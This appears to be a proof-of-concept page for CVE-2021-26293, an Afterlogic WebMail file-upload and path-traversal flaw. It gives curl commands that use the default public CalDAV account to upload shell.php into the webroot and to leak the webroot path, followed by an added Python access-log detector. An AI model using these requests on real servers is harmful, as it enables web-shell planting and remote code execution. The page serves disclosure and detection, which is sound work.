Awesome-POC/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md
2024-11-06 14:10:36 +08:00

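# Afterlogic Aurora & WebMail Pro File Upload Vulnerability CVE-2021-26293
## Vulnerability Description
The vulnerability stems from flawed filtering and restriction of uploaded files in Afterlogic Aurora & WebMail Pro; an attacker can upload a malicious file and thereby execute arbitrary code.
References: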
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
- https://forum.ywhack.com/thread-115325-1-8.html
## Affected Versions
```
WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9
```
## Vulnerability Reproduction
```bash
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
```
The default path is /var/www/html, but the configuration may have been changed to another path; you can try other ways to obtain it.
```bash
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
# Use an invalid path to trigger a SabreDAV error and view the webroot path
```
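
For log review, the requests above leave a recognizable trace: WebDAV writes under `/dav/server.php/files/` whose decoded path contains `..` segments, authenticated as `caldav_public_user@localhost`. The following is an added example, not part of the original page or the Afterlogic project; it assumes an Apache/nginx combined-format access log that records the Basic-auth user, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
DAV_PREFIX = "/dav/server.php/files/"
PUBLIC_USER = "caldav_public_user@localhost"  # account named in the request on this page


def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so %252e%252e is treated like %2e%2e."""
    for _ in range(max_rounds):
        if (decoded := unquote(path)) == path:
            break
        path = decoded
    return path


def classify(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path = fully_decode(m["path"]).replace("\\", "/")
    if not path.startswith(DAV_PREFIX):
        return []
    findings = []
    if ".." in path[len(DAV_PREFIX):].split("/"):
        findings.append("traversal")
        if m["method"] == "PUT" and m["status"].startswith("2"):
            findings.append("write-succeeded")
    if m["user"] == PUBLIC_USER and m["method"] in ("PUT", "DELETE", "MOVE", "COPY"):
        findings.append("public-user-write")
    return findings


# Constructed sample lines (not real traffic).
SAMPLE = [
    '203.0.113.7 - caldav_public_user@localhost [06/Nov/2024:14:10:36 +0800] "PUT /dav/server.php/files/personal/%2e%2e/%2e%2e//data/x.php HTTP/1.1" 201 0',
    '203.0.113.7 - caldav_public_user@localhost [06/Nov/2024:14:11:02 +0800] "DELETE /dav/server.php/files/personal/nonexistent HTTP/1.1" 404 310',
    '198.51.100.4 - alice@example.test [06/Nov/2024:14:12:00 +0800] "PUT /dav/server.php/files/personal/report.pdf HTTP/1.1" 201 0',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry[:60])
```

A `write-succeeded` finding means the server answered a traversal PUT with a 2xx status, so the target directory should be checked for unexpected files on hosts running the affected versions listed above.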